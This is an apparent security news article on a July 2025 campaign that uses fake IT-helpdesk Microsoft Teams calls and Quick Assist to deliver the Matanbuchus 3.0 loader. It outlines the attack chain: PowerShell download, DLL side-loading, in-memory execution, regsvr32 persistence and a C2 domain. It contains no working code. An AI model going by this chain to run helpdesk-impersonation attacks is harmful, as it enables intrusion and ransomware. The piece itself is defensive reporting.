Malicious Use of Microsoft Teams Calls for Delivery and Execution of Matanbuchus Ransomware
In the ever-evolving landscape of cyber threats, a new danger has emerged: Matanbuchus 3.0, a sophisticated malware loader and ransomware precursor. This malicious software is being distributed through cunning social engineering attacks that exploit Microsoft Teams, a popular business communication platform [1][2][3].
The attackers behind Matanbuchus 3.0 carefully select their targets, often employees within specific organisations, and reach out to them via external Teams calls, pretending to be IT helpdesk personnel [1][2]. During these calls, they persuade victims that their devices have issues requiring remote assistance. Once the victims comply, the attackers guide them to launch Quick Assist, a legitimate Windows remote support tool, granting the attacker interactive control over the victim's device [3].
Once in control, the attacker instructs the victim to execute a PowerShell script, which downloads and extracts a ZIP archive containing the Matanbuchus loader. The loader is then deployed on the victim’s device via DLL side-loading, a technique that utilises legitimate Windows processes to mask malicious activity [3]. This method bypasses traditional security measures and exploits the trust employees have in internal communication platforms like Teams [2].
Matanbuchus 3.0 represents a significant evolution from earlier versions, now operating as a full-fledged Malware-as-a-Service (MaaS) platform on underground markets [2]. Key features include powerful obfuscation and evasion mechanisms, in-memory loading, post-compromise flexibility, sophisticated social engineering, and selective targeting [1][2][3].
The malware employs Salsa20 encryption with 256-bit keys to hide its payloads, replacing the previously used RC4 algorithm for improved stealth [2]. Matanbuchus loads and executes malicious payloads directly in memory, avoiding disk-based detection mechanisms [3]. Once on the system, the loader can deploy a variety of follow-on payloads, including Cobalt Strike (for lateral movement and command-and-control) and ransomware [1][2].
The combination of advanced encryption, in-memory execution, and abuse of trusted business platforms like Teams makes Matanbuchus 3.0 a formidable threat for organisations lacking robust user education and endpoint protection. Upon successful initial infection, the malware creates a scheduled task named "EventLogBackupTask" that executes every five minutes, ensuring continuous system presence and command-and-control communication [1].
The malware's command-and-control communication impersonates legitimate Skype desktop traffic, blending with normal network traffic while communicating with the C2 server at nicewk[.]com over port 443 [1]. The persistence implementation utilises a unique combination of regsvr32 parameters [1].
This technique is evasive as it executes silently while suppressing errors, runs without modifying the registry, and automatically triggers the exported DllInstall function [1]. Matanbuchus 3.0 was first intercepted by Morphisec analysts before its public advertisement on underground forums [1].
In July 2025, a new cyberattack campaign emerged, weaponising Microsoft Teams calls to deploy the latest iteration of Matanbuchus ransomware [1]. The latest version of Matanbuchus introduces advanced capabilities including improved communication protocols, enhanced obfuscation techniques, and comprehensive system reconnaissance features [1].
Organisations are urged to invest in robust user education and endpoint protection to safeguard against such threats. Employees should be cautious of unsolicited Teams calls and requests for remote access, and IT departments should implement multi-layered security solutions to detect and prevent these sophisticated attacks.
- The sophisticated malware loader and ransomware precursor, Matanbuchus 3.0, leverages the popular business communication platform, Microsoft Teams, to execute its attacks, using social engineering tactics to gain access to targeted devices through remote assistance requests.
- In the realm of cybersecurity, the use of technology like Microsoft Teams, while essential for communication, can provide a means for malicious actors to carry out attacks, such as the distribution of Matanbuchus 3.0, thereby underscoring the need for robust user education and endpoint protection.
